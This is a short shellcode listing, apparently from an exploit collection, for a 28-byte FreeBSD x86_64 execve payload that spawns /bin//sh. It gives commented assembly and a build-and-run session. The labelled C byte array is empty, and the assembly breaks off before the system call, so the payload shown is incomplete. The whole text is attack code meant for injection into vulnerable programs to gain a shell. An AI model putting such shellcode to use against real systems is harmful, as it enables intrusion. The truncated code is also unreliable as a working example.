* Gitsnik, @dracyrys
* FreeBSD x86_64 execve, 28 bytes

C source:
char code[] = \

Intel Assembly:

global _start

; 28 byte execve FreeBSD x86_64
; [gitsnik@bsd64]$ nasm -f elf64 shell.nasm -o shell.o
; [gitsnik@bsd64]$ ld -o shell shell.o
; [gitsnik@bsd64]$ ./shell
; $ exit
; [gitsnik@bsd64]$

section .text

xor rcx, rcx
mul rcx

add al, 0x3b     ; execve()
mov rbx, 0x68732f2f6e69622f ; hs//nib/

; Argument one shell[0] = "/bin//sh"
push rdx     ; null
push rbx     ; hs//nib/

; We need pointers for execve()
push rsp     ; *pointer to shell[0]
pop rdi      ; Argument 1

; Argument two shell (including address of each argument in array)
push rdx     ; null
push rdi     ; address of shell[0]

; We need pointers for execve()
push rsp     ; address of char * shell
pop rsi      ; Argument 2
